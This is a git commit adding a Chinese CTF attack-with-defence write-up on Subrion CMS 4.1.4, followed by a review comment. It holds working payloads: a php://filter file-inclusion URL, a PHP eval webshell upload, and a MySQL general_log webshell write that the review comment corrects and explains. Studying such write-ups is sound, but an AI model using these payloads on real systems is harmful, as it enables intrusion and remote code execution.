Commit b9411b4

Merge pull request #20 from HuajiHD/main
Add: AWD writeup
2 parents 17e44ec + 19cb351 commit b9411b4

1 file changed, +95 -0 lines changed

docs/web/bugku-awd小记-10.7.md

Lines changed: 95 additions & 0 deletions
@@ -0,0 +1,95 @@
1+
# bugku-awd小记10.7
2+
3+
## Web
4+
5+
**Subrion CMS 4.1.4**
6+
7+
先把源码copy下来,拿D盾扫一遍
8+
9+
![image-20251007191012280](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834342.png)
10+
11+
#### 1.文件包含漏洞
12+
13+
fix:直接删除
14+
15+
![image-20251007191047854](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834344.png)
16+
17+
#### 2.弱口令+文件上传
18+
19+
![image-20251007191151830](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834345.png)
20+
21+
管理员后台的账户密码是admin/admin,同时可以从config.inc.php 中得到数据库密码![image-20251007191404310](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834346.png)
22+
23+
fix:改admin弱密码
24+
25+
![image-20251007191520845](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834347.png)
26+
27+
然后登录后台看到可以upload,所以攻击时考虑传马
28+
29+
#### 3.sql注入
30+
31+
在panel里
32+
33+
![image-20251007192515325](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834348.png)
34+
35+
Database处可以进行SQL注入,不过flag是错的
36+
37+
![image-20251007192544890](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834349.png)
38+
39+
这里去群里吹水去了,没来得及修
40+
41+
42+
43+
### attack:
44+
45+
#### 1.文件包含
46+
47+
访问,直接能读到flag
48+
49+
```
50+
http://192-168-1-67.pvp6715.bugku.cn/game/index.php/?file=php://filter/convert.base64-encode/resource=/flag
51+
```
52+
53+
#### 2.传马
54+
55+
**上传点:/panel/uploads**
56+
57+
传a.pht
58+
59+
```
60+
GIF89a
61+
<?php @eval($_REQUEST['huaji']);?>
62+
```
63+
64+
之后访问即可。
65+
66+
![image-20251007192348932](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834350.png)
67+
68+
#### 3.sql注入
69+
70+
panel里的database,先开启general_log
71+
72+
```
73+
set global general_log=on;
74+
```
75+
76+
然后让他写马进去,设置的日志文件路径
77+
78+
```
79+
set global general_log_file="/var/www/html/set_config.php";
80+
select '<?phpeval($_REQUEST[yunsee])?>';
81+
```
82+
83+
这样也可以写马进去
84+
85+
![image-20251007193033553](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834351.png)
86+
87+
## PWN
88+
89+
队友出的,ret2text,签到题
90+
91+
直接读取即可。
92+
93+
![image-20251007193319745](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834352.png)
94+
95+
fix的内容没发出来,就不写(抄)了
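Review bot: the general_log webshell on diff line 80 will not execute as written: `select '<?phpeval($_REQUEST[yunsee])?>';` has no whitespace after `<?php`, so PHP does not recognise it as an open tag (with short_open_tag enabled it is parsed as a call to an undefined `phpeval()` instead). It should read `select '<?php eval($_REQUEST[yunsee]);?>';`. That section should also state the preconditions the trick relies on: the MySQL account needs SUPER (SYSTEM_VARIABLES_ADMIN on MySQL 8) for `set global general_log_file=...`, and mysqld itself must be able to write into /var/www/html, otherwise the `set global` succeeds and no file ever appears. On the defence side, the fix for "3.sql注入" is recorded only as not having been done, and "fix:直接删除" under the file-inclusion section does not say what was deleted; since the attack section shows the vector is `index.php/?file=php://filter/...`, name the include handler that was removed (or the allowlist that replaced the `file` parameter) so the fix can be reproduced by the next team. The PWN fix is likewise absent; a one-line note of what the patched binary changed would make that section usable.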
